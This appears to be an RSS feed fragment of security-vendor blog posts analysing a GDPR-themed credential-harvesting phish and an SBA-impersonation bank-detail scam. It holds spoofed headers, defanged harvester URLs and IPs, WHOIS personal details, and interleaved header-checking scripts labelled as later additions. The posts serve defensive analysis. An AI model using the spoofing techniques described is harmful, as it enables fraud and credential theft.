7dc4f1c537c0557a3e38106803b43449</p><p>SHA1: acd368c99c7071461701bec70dcd113ad028fbbb</p><p>SHA256: 08c3d787f8a45044c85e4c95fb935cbab569d48a16dbe511b8abf6b79fa08046</p><p>SSdeep: 3072:V4PrXcuQuvpzm4bkiaMQgAlSmrvsPhQVwjZVPg:iDRv1m4bnQgISevsPOVwjZ5g</p><p><b>Attachment File Names:</b></p><p>Report.doc</p><p>Resume.doc</p><p>LG-7231 Medical report Covid-19.doc</p><p>IQ-5125 Medical report Covid-19.doc</p><p><b>PowerShell Executables (file names are a fixed-length, consisting of seven alphanumeric characters):</b></p><p>Qncqa3a.exe</p><p>S1xi8fyw.exe</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">2Bfo8Irb7k6uQ0BGPzn97p</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Are you GDPR-compliant? New phishing message harvests credentials with GDPR lure]]></title>
            <link>https://blog.cloudflare.com/gdpr-compliance-for-phishing/</link>
            <pubDate>Wed, 23 Sep 2020 10:57:00 GMT</pubDate>
            <description><![CDATA[ Credential harvesting phishing emails leverage GDPR compliance and exploits cloud-based services, Virtual Private Servers, to target sales executives. ]]></description>
<content:encoded><![CDATA[ <p><i>This blog originally appeared in September 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>A new campaign is attempting to harvest credentials from several businesses across industry verticals using the European Union’s General Data Protection Regulation (GDPR) compliance as a lure. This phishing message, first caught by Area 1 Security on August 31st, leverages misconceptions regarding <a href="https://gdpr.eu/compliance/">GDPR compliance</a> in an effort to steal email login credentials from unsuspecting targets.</p><p>The phish uses a classic tactic of creating a false sense of urgency to fool recipients into complying with the request. The attacker lures targets under the pretense that their email security is not GDPR-compliant and requires immediate action. For many who are not versed in GDPR regulations, this phish could be merely taken as more red tape to contend with rather than being identified as a malicious message.</p><p>As shown below, the attacker makes use of graphics and clever formatting to give the message a more credible, authoritative appearance. To maintain the illusion that the email originated from a legitimate source, the sender email address is spoofed to appear as an automated message from the security department of the targeted company. In order to stay relevant, the attacker also regularly updates the comply-by (or “Action required”) date included in the body of the message.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6jQRzCRvQWcSvRurLPVSL1/f7d580cdafa6b368846f36a8d24c2636/image3-6.png" />
            
            </figure><p>Based on Area 1 Security’s analysis, this campaign is predominantly launched at public-facing emails of the targeted companies, e.g. @.com. However, to a lesser extent, there are instances when individuals are targeted, typically executives and upper management. These individuals often work in the sales department, demonstrating the attacker is purposefully choosing targets who are likely to have access to client data and need to comply with GDPR regulations.</p><p>In the initial wave of the campaign, the attacker sent phishing messages from a Virtual Private Server (VPS) IP address belonging to ReadyIDC, 103[.]22[.]183[.]95. Using a VPS allows the attacker a greater degree of anonymity when conducting phishing campaigns since it is extremely difficult to pinpoint their physical location. They are able to leverage all the benefits of using a cloud-based service, as well as the ability to easily spin up new servers in the event that their IP address gets blocked or otherwise identified as phishing infrastructure.</p><p>A careful inspection of the headers in one of the first instances of this phish reveals a misstep by the threat actor when launching their campaign. As detailed below, despite successfully spoofing the visible FROM header, the envelope MAIL FROM address divulges that the attacker sent their malicious messages via a Gmail account.</p>
<pre><code>MAIL FROM:&lt;&lt;redacted&gt;@gmail.com&gt;
From: noreplysecurityservices@&lt;targeted company’s domain&gt;
To: &lt;public-facing targeted company’s email account&gt;
Subject: User account security alert
Date: 31 Aug 2020 22:17:43 +0700</code></pre>
<p>This mistake is quickly rectified in subsequent phishing messages, where the attacker successfully spoofs not only the visible From address but also the envelope MAIL FROM domain of the targeted companies. However, these “stealthier” messages expose yet another blunder, as evidenced by the presence of a “Disposition-Notification-To” header. This header indicates that read-receipts are enabled, meaning the attacker will be notified when a target opens the malicious email. This once again discloses the sender account, which happens to be the same Gmail address as identified in the first wave of the campaign.</p><p>On the second day of the campaign (September 1st) the attacker began inserting SMTP HELO commands to tell receiving email servers that the phishing message originated from the target company’s domain, when in fact it came from an entirely different origin. This is a common tactic used by malicious actors to spoof legitimate domains and easily bypass legacy email security solutions. Shown in the following headers, the true origin of the email is the IP address 196[.]53[.]250[.]243:</p>
            <pre><code>smtp.pra=noreplysecurityservices@&lt;targeted company’s domain&gt;; spf=None
smtp.mailfrom=noreplysecurityservices@&lt;targeted company’s domain&gt;; spf=None
smtp.helo=postmaster@&lt;targeted company’s domain&gt;
Received: from unknown (HELO &lt;targeted company’s domain&gt;) ([196[.]53[.]250[.]243])
  by &lt;redacted&gt;.com with ESMTP; 01 Sep 2020 05:19:33 -0400
From: noreplysecurityservices@&lt;targeted company’s domain&gt;
To: &lt;email of employee at targeted company&gt;
Subject: Email User security alert
Date: 1 Sep 2020 16:19:07 +0700</code></pre>
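<p>Both header fragments above can be checked mechanically at the receiving side. The following Python is an added example, not code from the post or from Area 1 Security; it parses two constructed header sets modelled on the two waves (victim.example stands in for the targeted company's domain, attacker@gmail.com for the redacted sender account) and flags the mismatches the post describes: an envelope MAIL FROM domain that differs from the visible From, a Disposition-Notification-To header pointing somewhere else, a HELO that claims the target's domain from a host with no reverse DNS, and a missing or non-passing SPF result. The envelope sender is passed in separately because it is an SMTP-level value, not a message header.</p>

```python
import re
from email import message_from_string

# Constructed header samples. Wave 1: visible From spoofed, envelope sender not.
WAVE1 = """\
From: noreplysecurityservices@victim.example
To: info@victim.example
Subject: User account security alert
Date: 31 Aug 2020 22:17:43 +0700

body"""

# Wave 2: envelope sender spoofed too, but a read-receipt header and a HELO from
# an unresolved host give the game away. The IP is the one quoted in the post.
WAVE2 = """\
Authentication-Results: mx.victim.example; spf=none smtp.mailfrom=noreplysecurityservices@victim.example smtp.helo=postmaster@victim.example
Received: from unknown (HELO victim.example) ([196.53.250.243])
  by mx.victim.example with ESMTP; 01 Sep 2020 05:19:33 -0400
Disposition-Notification-To: attacker@gmail.com
From: noreplysecurityservices@victim.example
To: employee@victim.example
Subject: Email User security alert
Date: 1 Sep 2020 16:19:07 +0700

body"""

ADDR = re.compile(r"[\w.+-]+@([\w.-]+)")


def domain_of(value):
    """Domain part of the first address found in a header value, lower-cased."""
    m = ADDR.search(value or "")
    return m.group(1).lower() if m else None


def assess(envelope_from, raw_message, our_domain):
    """Return a list of findings for one message whose From claims our_domain.

    envelope_from is the SMTP MAIL FROM address recorded by the receiving MTA;
    raw_message is the message text including headers.
    """
    msg = message_from_string(raw_message)
    findings = []
    from_dom = domain_of(msg.get("From"))
    env_dom = domain_of(envelope_from)

    # Wave 1 mistake: visible From spoofed, envelope sender not.
    if from_dom == our_domain and env_dom != our_domain:
        findings.append("envelope MAIL FROM domain %s differs from visible From %s" % (env_dom, from_dom))

    # Wave 2 mistake: read receipts route back to the real account.
    dnt = msg.get("Disposition-Notification-To")
    if dnt and domain_of(dnt) != from_dom:
        findings.append("read-receipt (Disposition-Notification-To) points to %s" % domain_of(dnt))

    # HELO claiming our domain from a host with no reverse DNS.
    for received in msg.get_all("Received", []):
        m = re.search(r"from (\S+) \(HELO (\S+)\) \(\[([\d.]+)\]\)", received)
        if m and m.group(2).lower() == our_domain and m.group(1).lower() == "unknown":
            findings.append("HELO claims %s from unresolved host %s" % (our_domain, m.group(3)))

    # Mail claiming our own domain should carry a passing SPF result.
    spf = re.search(r"spf=(\w+)", msg.get("Authentication-Results", ""))
    if from_dom == our_domain and (spf is None or spf.group(1).lower() != "pass"):
        findings.append("From claims our domain but SPF result is %s" % (spf.group(1).lower() if spf else "absent"))
    return findings


if __name__ == "__main__":
    print(assess("attacker@gmail.com", WAVE1, "victim.example"))
    print(assess("noreplysecurityservices@victim.example", WAVE2, "victim.example"))
```

<p>None of these checks needs a deny list: each compares something the attacker had to assert (From, HELO, envelope sender) against something they could not control (the receiving MTA's own records and the domain the organisation knows it owns), which is why they keep working after the sending IP changes.</p>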
            <p>The attacker switched to this IP address to launch the second wave of the campaign. Depicted below is a screenshot of a vulnerable and shoddy gaming site, Ran Smok, which is directly accessible via this IP (i.e., hxxp://196[.]53[.]250[.]243). The site links to various web pages that result in “Access denied,” and the IP address has been associated with numerous suspicious websites over the years. An analysis of available services running on the IP address reveals that port 25 (used by the Simple Mail Transfer Protocol, or SMTP) is running in a filtered state, and is most likely how the attacker is sending the phishing messages. A closer look at the list of open ports on the IP address reveals a number of additional services that should never be open to the internet, thus leaving the host at this IP exceedingly vulnerable, and all-the-more enticing to an attacker.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5VXVpm0mmjzWeIqtFFcNvb/bbdcee882e927bc10f2204ebb0933a4c/image1-8.png" />
            
            </figure>
    <div>
      <h3>Analysis of Link</h3>
      <a href="#analysis-of-link">
        
      </a>
    </div>
    <p>The malicious payload in this phish is a link to a credential harvester, located at hxxps://www[.]techgaia[.]com/wp-content/email/ID/sign_in/dc0b80571c76818f4f5916ff6668eyrtsaaadaf8/completesrvr/verification/Src/?email=. The value of the “email” parameter in the URL will vary depending on the recipient, wherein the threat actor tailors each phishing message by setting this parameter equal to the target’s email address. The link opens up to a simple web page, hosted on a <a href="https://kinsta.com/blog/wordpress-security/">compromised WordPress site</a>, as shown below.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1Lgr0NrLe8W6kDAAqGH9us/1d8c4c054a6c983016e8f14655441b6c/image2-10.png" />
            
</figure><p>The HTML form on the malicious webpage autopopulates the username field based on the email address found in the URL’s “email” parameter. After clicking “Next,” the page will prompt the user to enter a password. Based on Area 1 Security’s analysis, the page appears to return an error regardless of whether the victim enters a correct password. Stolen credentials are then sent to the attacker via a script located at hxxps://www[.]techgaia[.]com//wp-content/email/ID/sign_in/dc0b80571c76818f4f5916ff6668eyrtsaaadaf8/completesrvr/verification/Src/l0gin[.]php.</p><p>Area 1 Security’s analysis revealed that www[.]techgaia[.]com is the older, now-defunct site for a revamped IT consulting services company. The site was running an outdated version of WordPress (version 4.9.7), making it susceptible to a number of <a href="https://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/version_id-257818/Wordpress-Wordpress-4.9.7.html">vulnerabilities</a>. Its content has since been removed, and navigating to the domain now results in an HTTP 301 redirect. The vulnerable nature of this site made it easy prey, providing the perfect opportunity for an attacker to insert themselves into the fray and leverage the historic legitimacy of the site to bypass detections. With the ease of compromising unmaintained, vulnerable WordPress sites, it will only take the attacker a matter of days (at most) to resume operations with a new, otherwise legitimate site. As a result, legacy vendors that rely on deny lists to block suspect messages will be one step behind the attacker.</p>
    <div>
      <h3>Recommendations</h3>
      <a href="#recommendations">
        
      </a>
    </div>
<p>For companies that deal with sensitive customer data, it is important to be knowledgeable in the latest data security and privacy regulations for the respective industry and region. New data privacy laws, such as the California Consumer Protection Act, are requiring businesses to ensure that consumers residing in California are able to opt out of data collection. All the while, GDPR currently remains the most stringent regulation in consumer data privacy. It is vital to communicate with all employees any updates regarding new protocols for handling Personally Identifiable Information (PII) to help ensure those in your organization do not fall victim to phishing attacks that rely on confusion from unclear or nonexistent communication regarding these regulations.</p><p>Additionally, it is imperative that employees understand the risks of clicking on unsolicited links and entering sensitive data into unauthorized login portals. However, current technology allows an attacker to easily create a phish that is a pixel-perfect forgery of a legitimate login page. Therefore, the safer, more secure option is to utilize a <a href="https://www.cloudflare.com/zero-trust/solutions/email-security-services/">dedicated security solution</a>; one that uses bleeding-edge technology to verify emails before they arrive in a user’s inbox, removing the risk of accidentally clicking a malicious link or file.</p><p>Area 1 Security’s advanced detection techniques, such as blind URL inspection, help stop phishing messages like those seen in this GDPR campaign from reaching customers’ inboxes. Our comprehensive <a href="https://www.cloudflare.com/zero-trust/products/email-security/">anti-phishing solution</a> includes sophisticated pattern-matching algorithms that allow us to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
<p><b>Credential Harvesters:</b></p><p>hxxps://www[.]techgaia[.]com/wp-content/email/ID/sign_in/dc0b80571c76818f4f5916ff6668eyrtsaaadaf8/completesrvr/verification/Src/?email=</p><p>hxxps://www[.]techgaia[.]com//wp-content/email/ID/sign_in/dc0b80571c76818f4f5916ff6668eyrtsaaadaf8/completesrvr/verification/Src/l0gin[.]php</p><p><b>Sender IP Addresses:</b></p><p>196[.]53[.]250[.]243</p><p>103[.]22[.]183[.]95</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">3MMiLOjbAPhwxF7VVoaQ14</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Latest SBA phishing attempt: stealthy social engineering phish using newly registered domains attempts to gain bank details]]></title>
            <link>https://blog.cloudflare.com/sba-phishing-attempt/</link>
            <pubDate>Wed, 09 Sep 2020 11:17:00 GMT</pubDate>
            <description><![CDATA[ Area 1 blocks social engineering, COVID-19 phishing emails impersonating Small Business Administration, using Newly Registered Domains, PDF attachments. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in September 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Congress may be in a deadlock over a second stimulus package, but malicious actors are always ready to pounce on the slightest opportunity to exploit the public’s confusion. The US Small Business Administration (SBA) is being impersonated in Coronavirus-themed phishing messages that leverage unfamiliarity with loan application procedures. With many small businesses relying on loans from the SBA to keep their doors open during the quarantine slump, cyber criminals are capitalizing on delays in loan approvals to swindle businesses.</p><p>Since at least April, malicious actors have been impersonating the SBA in <a href="https://www.sba.gov/blog/be-alert-about-email-phishing-scams-bad-actors-seeking-take-advantage-through-sba-loan-application">various campaigns</a> leveraging diverse Tactics, Techniques and Procedures (TTPs), such as malicious payloads, credential harvesters, and stealthy social engineering, all aimed at severely compromising devices and stealing money from companies. In our “How to Stop Financial Phishing Attacks” webinar earlier this year (available on-demand <a href="https://gateway.on24.com/wcc/eh/2153307/lp/3952832/beyond-email-gateways-email-authentication-how-to-stop-financial-phishing-attacks">here</a>), we covered one such campaign, which attempted to spread <a href="https://securityboulevard.com/2020/04/guloader-the-rat-downloader/">GuLoader malware</a>.</p>
    <div>
      <h3>A Simple Yet Effective Approach</h3>
    </div>
    <p>The latest wave of attacks involves a clever social engineering tactic that can fly under almost any radar. This phishing message does not contain errant red flags that would maladroitly trigger a litany of detections. Unlike the previously observed campaigns, this wave of attacks does not contain any malicious payloads, only a benign attachment named <b>SBA - Disaster Loan Assistance Form.pdf</b>. The attacker opts for a clever and silent attack vector, relying on the target believing the email is indeed from the SBA.</p><p>Looking at the email below, it is clear this is not your typical <a href="https://www.fbi.gov/scams-and-safety/common-scams-and-crimes/nigerian-letter-or-419-fraud">419 phishing scam</a>, poorly masquerading as an official entity to solicit money. The attacker ensures that even the smallest of details are correct in order to give the message a more credible appearance:</p><ul><li><p>First, the Sender email address looks entirely legitimate.</p></li><li><p>Second, the target’s full name appears in the body of the message, as opposed to just a mere email address, as is often seen in more low-level attacks.</p></li><li><p>Lastly, the message is free of typos and the formatting is clean and professional.</p></li></ul>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5SL2Wqk58XJjYMH4dOxO9D/ad3b9dbec1e6a989a8b3941cca4cce28/image5-7.png" />
            
            </figure><p>The attacker successfully spoofs the FROM headers of the real SBA Disaster Customer Service account, as seen on the left. Unfortunately, replying to this email will not send your Economic Injury Disaster Loan (EIDL) application to the SBA, but instead to the attacker’s account at the malicious Reply-To domain, as shown on the right.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2fb5YRj623UslHx7ROThhJ/49ee74f3ebdecb3a4fb621f4ccd6e64a/image4-7.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7qqNmvS5ehJRWaP7oy1Uv5/e0c9551b4d553adda0a5ae43c2c60b44/image6-5.png" />
            
            </figure><p>Just days before launching this campaign, the attacker created the malicious Reply-To domain gov-sba[.]us using bogus registration information. Whois details for this newly registered domain (NRD) are shown below.</p>
            <pre><code>Domain Name: gov-sba[.]us
Registry Domain ID: D18007599F1554B3DAA9B6AFEA0F4235C-NSR
Registrar WHOIS Server:
Registrar URL: www.psi-usa.info
Updated Date: 2020-08-05T06:22:13Z
Creation Date: 2020-07-31T06:22:09Z
Registry Expiry Date: 2021-07-31T06:22:09Z
Registrar: PSI-USA, Inc. dba Domain Robot
Registrar IANA ID: 151
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: C186298DF566447488A165F7E4F5B8F60-NSR
Registrant Name: Krikor Derabrahamian
Registrant Organization:
Registrant Street: Rotenloewengasse 15
Registrant City: Wien
Registrant State/Province: US
Registrant Postal Code: 1090
Registrant Country: US
Registrant Phone: +44.7418440320
Registrant Email: office@teamtours.at
Registrant Application Purpose: P5
Registrant Nexus Category: C31/US
Registry Admin ID: C5DF36C6EB720453A8CB08A1FC96AB740-NSR
Admin Name: Krikor Derabrahamian
Admin Organization:
Admin Street: Rotenloewengasse 15
Admin City: Wien
Admin State/Province: AT
Admin Postal Code: 1090
Admin Country: AT
Admin Phone: +44.7418440320
Admin Email: office@teamtours.at
Admin Application Purpose: P5
Admin Nexus Category: C31/AT
Registry Tech ID: C5651DB7CEC1B420BAE1B3F7BE7E214B0-NSR
Tech Name: Gerald Auer
Tech Organization: World4You Internet Services GmbH
Tech Street: Hafenstrasse 47-51
Tech City: Linz
Tech State/Province: OOE
Tech Postal Code: 4020
Tech Country: AT
Tech Phone: +43.73293035
Tech Fax: +43.7329303510
Tech Email: techadmin@world4you.com
Tech Application Purpose: P5
Tech Nexus Category: C31/AT
Name Server: ns2.world4you.at
Name Server: ns1.world4you.at
DNSSEC: unsigned</code></pre>
            <p>NRDs are consistently used by attackers to fool users into taking actions that jeopardize the security of their organization. Phishing that leverages NRDs is a particularly effective tactic for a variety of reasons. For one thing, it is a common attacker technique to circumvent Secure Email Gateways (SEGs). New domains have very little history or presence, which allows them to bypass typical blocklists. In fact, a significant number of campaigns that Area 1 Security catches leverage new domains, which are often ephemeral (active only for about 48 hours or less).</p><p>Attackers commonly impersonate trusted entities in order to dupe targets into letting their guard down. This is made all the easier by registering an NRD that is also a malicious look-alike domain, in this case gov-sba[.]us. As a result, the true sender domain, buried deep within an email’s headers, is often overlooked. This is particularly the case when phish are opened on mobile devices, such as cell phones, where true sender domains are often hidden and only Display Names are shown. What’s more, revealing this information takes fairly burdensome actions in most mobile device (and other purpose-built) mail clients.</p><p>To further con targets into filling out the fraudulent EIDL application, the attacker successfully spoofed the SBA’s legitimate sender address, <a>disastercustomerservice@sba.gov</a>. In a stealthy move, the attacker also presented the SBA’s domain as the SMTP HELO identity, as shown in the headers below.</p>
            <pre><code>Authentication-Results-Original: 990w8b.myvserver.online;	spf=pass (sender IP
 is 64.44.141.5) smtp.mailfrom=disastercustomerservice@sba.gov
 smtp.helo=sba.gov
Received-SPF: pass (990w8b.myvserver.online: connection is authenticated)
Reply-To: "U.S. Small Business Administration (SBA)" &lt;disastercustomerservice@gov-sba.us&gt;
From: "U.S. Small Business Administration (SBA)" &lt;disastercustomerservice@sba.gov&gt;</code></pre>
            <p>The HELO identity told the receiving email server to treat the message as if it originated from SBA’s domain, when in fact the sender had a completely different domain and IP address, namely 990w8b[.]myvserver[.]online and 64[.]44[.]141[.]5. This resulted in various legacy email security solutions accepting the message for delivery. Note also that the Authentication-Results-Original header above names 990w8b[.]myvserver[.]online as the server that produced the SPF verdict: that “pass” was stamped by the sending infrastructure itself, not by the recipient’s mail server, and a receiving gateway should only act on authentication results it has computed on its own.</p>
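            <p>As an added, defender-side example that is not part of the original post, the following Python parses the header block quoted above and derives the indicators this post describes: the Reply-To domain differing from the From domain, that domain’s age taken from the WHOIS creation date quoted earlier, and the fact that the SPF “pass” was stamped by 990w8b.myvserver.online rather than by the recipient’s own mail server. The authserv-id mx.example.org, the receipt date and the in-memory WHOIS cache are assumptions made for the example; a real gateway would evaluate SPF itself against the connecting IP and query RDAP/WHOIS.</p>

```python
import re
from datetime import datetime
from email.utils import parseaddr

# Constructed sample: the header lines quoted in the post, HTML entities decoded.
SAMPLE_HEADERS = (
    "Authentication-Results-Original: 990w8b.myvserver.online;\tspf=pass (sender IP\n"
    " is 64.44.141.5) smtp.mailfrom=disastercustomerservice@sba.gov\n"
    " smtp.helo=sba.gov\n"
    "Received-SPF: pass (990w8b.myvserver.online: connection is authenticated)\n"
    'Reply-To: "U.S. Small Business Administration (SBA)" <disastercustomerservice@gov-sba.us>\n'
    'From: "U.S. Small Business Administration (SBA)" <disastercustomerservice@sba.gov>\n'
)
# Constructed stand-in for WHOIS: the creation date from the record quoted in
# the post. A real gateway would query RDAP/WHOIS instead of this dict.
WHOIS_CACHE = {"gov-sba.us": "Domain Name: gov-sba.us\nCreation Date: 2020-07-31T06:22:09Z\n"}
OUR_AUTHSERV_ID = "mx.example.org"  # hypothetical authserv-id of our own MX
NRD_WINDOW_DAYS = 30


def parse_headers(raw):
    """Unfold RFC 5322 header lines into {lower-name: [values]}."""
    headers = {}
    for line in re.sub(r"\r?\n[ \t]+", " ", raw).splitlines():
        if line.strip():
            name, _, value = line.partition(":")
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def parse_auth_results(value):
    """Return (authserv-id, [clauses]) for an Authentication-Results value;
    each clause is {'method', 'result', 'smtp.helo', ...}. Comments are dropped."""
    parts = [p.strip() for p in re.sub(r"\([^)]*\)", "", value).split(";")]
    authserv_id = parts[0].split()[0].lower()
    clauses = []
    for part in parts[1:]:
        tokens = part.split()
        if tokens and "=" in tokens[0]:
            method, result = tokens[0].split("=", 1)
            clause = {"method": method.lower(), "result": result.lower()}
            for tok in tokens[1:]:
                if "=" in tok:
                    key, val = tok.split("=", 1)
                    clause[key.lower()] = val
            clauses.append(clause)
    return authserv_id, clauses


def domain_of(header_value):
    addr = parseaddr(header_value)[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def domain_age_days(domain, received_at, whois=WHOIS_CACHE):
    """Days from the WHOIS creation date to receipt, or None if unknown."""
    m = re.search(r"^Creation Date:\s*(\S+)", whois.get(domain, ""), re.M)
    if not m:
        return None
    return (received_at - datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")).days


def assess(raw, received_at, our_authserv_id=OUR_AUTHSERV_ID):
    """Derive the header-level indicators described in the post."""
    h = parse_headers(raw)
    from_domain = domain_of(h.get("from", [""])[0])
    reply_to_domain = domain_of(h.get("reply-to", [""])[0])
    findings, claimed_spf = [], None

    if reply_to_domain and reply_to_domain != from_domain:
        findings.append(f"reply-to domain {reply_to_domain} differs from From domain {from_domain}")
        age = domain_age_days(reply_to_domain, received_at)
        if age is not None and age < NRD_WINDOW_DAYS:
            findings.append(f"reply-to domain {reply_to_domain} was registered {age} days ago")

    # Authentication-Results carried inside the message were stamped by another
    # party's server (here the attacker's own host), so they prove nothing.
    for name in ("authentication-results", "authentication-results-original"):
        for value in h.get(name, []):
            authserv_id, clauses = parse_auth_results(value)
            spf = next((c for c in clauses if c["method"] == "spf"), None)
            if spf:
                claimed_spf = {"authserv_id": authserv_id, "result": spf["result"],
                               "helo": spf.get("smtp.helo"), "mailfrom": spf.get("smtp.mailfrom")}
            if authserv_id != our_authserv_id:
                findings.append(f"{name} stamped by {authserv_id}, not by our MX: discard it")

    return {"from_domain": from_domain, "reply_to_domain": reply_to_domain,
            "claimed_spf": claimed_spf, "findings": findings}


def demo():
    """Assess the sample with an assumed receipt date a few days after the
    Reply-To domain was created, as the post describes."""
    return assess(SAMPLE_HEADERS, datetime(2020, 8, 5))


if __name__ == "__main__":
    for finding in demo()["findings"]:
        print(finding)
```

            <p>Running the script prints three findings for the sample: the Reply-To/From domain mismatch, the four-day age of gov-sba.us, and the foreign authserv-id on the carried-in SPF result. The design point is the last one: a gateway must strip or ignore any Authentication-Results header it did not produce itself, otherwise a sender can ship its own “spf=pass” along with the message.</p>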
    <div>
      <h3>Reply with Bank Details</h3>
    </div>
    <p>A target’s reply to this phish is the linchpin of the whole scam, given that the attached EIDL application requests private financial information. Further, the likelihood of a reply is dramatically increased by the seemingly benign and unassuming nature of this purported government form. In the body of the message, the attacker provides instructions to simply reply to the email with a completed EIDL application, of course making sure to note that all personal and banking details must be correct.</p><p>Looking at the PDF below, it’s almost impossible to believe this is a forgery, especially with a valid Office of Management and Budget (OMB) form number. In fact, the PDF closely resembles the legitimate <a href="https://covid19relief.sba.gov/#/business-info">Business Information form</a> of the SBA’s online application for EIDL, and even includes an oath at the bottom certifying that all information is true under penalty of perjury. <b>With this attached PDF the attacker clearly has one goal in mind: to steal sensitive account and routing information from businesses.</b></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7eo8OUef6V5ym63PUxdNYx/8bdeeee4de42534cb28602b93467d647/image3-7.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2KpkngTHUKOi6zAvPKiYnb/ac57eab45defeb82bd272e6b93c2843e/image1-10.png" />
            
            </figure><p>The only telltale sign that this application is a forgery can be found buried in the document properties, where no typical target would venture:</p><ul><li><p>Firstly, as seen below, this PDF was created with <a href="https://en.wikipedia.org/wiki/Skia_Graphics_Engine">Skia</a>, an open-source graphics engine for a variety of web platforms. This is a big deviation from the standard Adobe PDF Library that is used to create such documents.</p></li><li><p>Secondly, the document’s timestamp reveals that it was recently created on July 31st, 2020, long after the creation of the legitimate EIDL form.</p></li></ul>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7eR2z7fvU5PANaxamjrOyR/e93c85a8fa3e3ce15ac3f99d90854060/image2-12.png" />
            
            </figure>
    <div>
      <h3>Exposing the Imposter</h3>
    </div>
    <p>To thwart these sneaky SBA-themed phish, Area 1 Security uses multiple advanced techniques that leverage insight gained from early identification of attacker campaign infrastructure, enabling superior detection of emails from spoofed domains and accounts. Our anti-phishing service analyzes email for threat indicators, such as recently registered domains, <a href="https://www.cloudflare.com/learning/dns/glossary/what-is-a-domain-name/">domain name</a> obfuscation, and look-alike domains. Additionally, the service uses real-time correlation with associated brand infrastructure to verify authenticity.</p><p>Area 1 also uses lexical analysis of message body and subject to detect financially driven attacks. Headers are checked for sender display name and true sender mismatches, and SPF, DKIM, and DMARC records are checked to validate the sender. Using preemptive threat hunting and a broad set of proprietary analysis techniques, Area 1 identifies phishing campaigns, including those with malicious newly registered domains, that other defenses miss.</p>
    <div>
      <h3>Recommendations</h3>
    </div>
    <p>The <a href="https://www.sba.gov/document/report-sba-programs-scams-fraud-alerts">official SBA website</a> provides information on protecting yourself from these scams. The SBA will <i>never</i> proactively contact you for loan applications. If you receive an email asking for additional information regarding an existing loan application, first ensure there is an application number referenced in the email, and that it matches your application.</p><p>If you suspect that you have received an SBA phishing email, call the Office of Inspector General Hotline at 800-767-0385 or report it online via the <a href="https://www.sba.gov/about-sba/oversight-advocacy/office-inspector-general/office-inspector-general-hotline">Office of Inspector General Hotline</a>.</p><p>Area 1 Security’s advanced Machine Learning and Artificial Intelligence technology leverages algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
    </div>
    <p><b>Reply-To Address:</b></p><p>disastercustomerservice@gov-sba[.]us</p><p><b>Malicious look-alike NRD:</b></p><p>gov-sba[.]us</p><p><b>Sender IP:</b></p><p>64[.]44[.]141[.]5</p><p><b>Sender Domain:</b></p><p>990w8b[.]myvserver[.]online</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">1KhkezEV2OQhiM60awSjLo</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[“Face mask manufacturer” supplies Agent Tesla Malware: campaign employs Covid-19 lures and sophisticated evasion techniques]]></title>
            <link>https://blog.cloudflare.com/facemask-phishing-delivers-malware/</link>
            <pubDate>Thu, 27 Aug 2020 12:02:00 GMT</pubDate>
            <description><![CDATA[ Covid-19 phishing attack exploits need for face masks, thermometers to launch Agent Tesla malware (advanced Remote Access Trojan); bypasses gateways, DMARC. ]]></description>
